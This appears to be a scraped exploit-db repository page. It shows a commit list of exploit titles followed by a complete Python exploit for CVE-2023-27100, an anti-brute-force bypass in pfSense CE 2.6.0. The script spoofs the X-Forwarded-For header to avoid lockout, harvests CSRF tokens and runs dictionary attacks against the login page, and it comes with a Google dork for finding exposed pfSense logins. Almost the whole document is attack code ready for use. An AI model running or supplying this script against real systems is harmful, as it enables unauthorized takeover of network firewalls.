85954a8fad
34 changes to exploits/shellcodes/ghdb ENTAB ERP 1.0 - Username PII leak ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) FortiRecorder 6.4.3 - Denial of Service Schneider Electric v1.0 - Directory traversal & Broken Authentication Altenergy Power Control Software C1.2.5 - OS command injection Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) Lucee Scheduled Job v1.0 - Command Execution Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) Adobe Connect 11.4.5 - Local File Disclosure Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) Suprema BioStar 2 v2.8.16 - SQL Injection Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure Icinga Web 2.10 - Arbitrary File Disclosure Joomla! v4.2.8 - Unauthenticated information disclosure Medicine Tracker System v1.0 - Sql Injection Online Appointment System V1.0 - Cross-Site Scripting (XSS) Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) pfsenseCE v2.6.0 - Anti-brute force protection bypass Restaurant Management System 1.0 - SQL Injection WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) Microsoft Windows 11 - 'cmd.exe' Denial of Service ActFax 10.10 - Unquoted Path Services ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
95 lines
No EOL
3.1 KiB
Python
Executable file
95 lines
No EOL
3.1 KiB
Python
Executable file
#!/usr/bin/python3
|
|
|
|
## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
|
|
## Google Dork: intitle:"pfSense - Login"
|
|
## Date: 2023-04-07
|
|
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
|
|
## Vendor Homepage: https://www.pfsense.org/
|
|
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
|
|
## Version: pfSenseCE <= 2.6.0
|
|
## CVE: CVE-2023-27100
|
|
|
|
# Vulnerability
|
|
## CVE: CVE-2023-27100
|
|
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
|
|
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
|
|
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66
|
|
|
|
import requests
|
|
import sys
|
|
import re
|
|
import argparse
|
|
import textwrap
|
|
from urllib3.exceptions import InsecureRequestWarning
|
|
|
|
# Expected Arguments
|
|
parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
|
|
formatter_class=argparse.RawTextHelpFormatter,
|
|
epilog=textwrap.dedent('''
|
|
Exploit Usage :
|
|
./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
|
|
./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))
|
|
|
|
parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
|
|
parser.add_argument("-u", "--usersList", help="Username Dictionary")
|
|
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
|
|
args = parser.parse_args()
|
|
|
|
if len(sys.argv) < 2:
|
|
print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
|
|
sys.exit(1)
|
|
|
|
# Variable
|
|
url = args.url
|
|
usersList = args.usersList
|
|
passwdList = args.passwdList
|
|
|
|
# Suppress only the single warning from urllib3 needed.
|
|
if url.upper().startswith("HTTPS://"):
|
|
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
|
|
|
print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')
|
|
|
|
|
|
def login(userlogin, userpasswd):
|
|
session = requests.session()
|
|
r = session.get(url, verify=False)
|
|
|
|
# Getting CSRF token value
|
|
csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
|
|
csrftoken = csrftoken.group(1)
|
|
|
|
# Specifying Headers Value
|
|
headerscontent = {
|
|
'User-Agent': 'Mozilla/5.0',
|
|
'Referer': f"{url}",
|
|
'X-Forwarded-For': '42.42.42.42'
|
|
}
|
|
|
|
# POST REQ data
|
|
postreqcontent = {
|
|
'__csrf_magic': f"{csrftoken}",
|
|
'usernamefld': f"{userlogin}",
|
|
'passwordfld': f"{userpasswd}",
|
|
'login': 'Sign+In'
|
|
}
|
|
|
|
# Sending POST REQ
|
|
r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)
|
|
|
|
# Conditional loops
|
|
if r.status_code != 200:
|
|
print(f'[*] - Found Valid Credential !!')
|
|
print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
|
|
sys.exit(0)
|
|
|
|
|
|
# Reading User.txt & Pass.txt files
|
|
userfile = open(usersList).readlines()
|
|
passfile = open(passwdList).readlines()
|
|
|
|
for user in userfile:
|
|
user = user.strip()
|
|
for passwd in passfile:
|
|
passwd = passwd.strip()
|
|
login(user, passwd) |